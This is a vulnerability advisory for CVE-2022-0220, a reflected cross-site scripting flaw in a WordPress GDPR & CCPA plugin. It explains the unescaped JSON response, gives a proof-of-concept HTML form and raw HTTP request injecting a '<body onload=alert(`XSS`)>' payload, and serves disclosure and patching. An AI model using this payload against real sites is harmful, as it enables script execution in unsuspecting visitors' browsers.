WordPress GDPR & CCPA < 1.9.27 – Unauthenticated Reflected Cross-Site Scripting | CVE 2022-0220

Description

The check_privacy_settings AJAX action of the plugin, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type. Since an HTML payload isn't properly escaped, it may be interpreted by a web browser led to this endpoint. Javascript code may be executed on a victim's browser. Due to v1.9.26 adding a CSRF check, the XSS is only exploitable against unauthenticated users (as they all share the same nonce)

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="check_privacy_settings" />
      <input type="hidden" name="settings[40]" value="40" />
      <input type="hidden" name="settings[41]" value="<body onload=alert(`XSS`)>" />
      <input type="hidden" name="nonce" value="XXXX" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
Connection: close
Upgrade-Insecure-Requests: 1

action=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(`XSS`)%3e&nonce=XXXX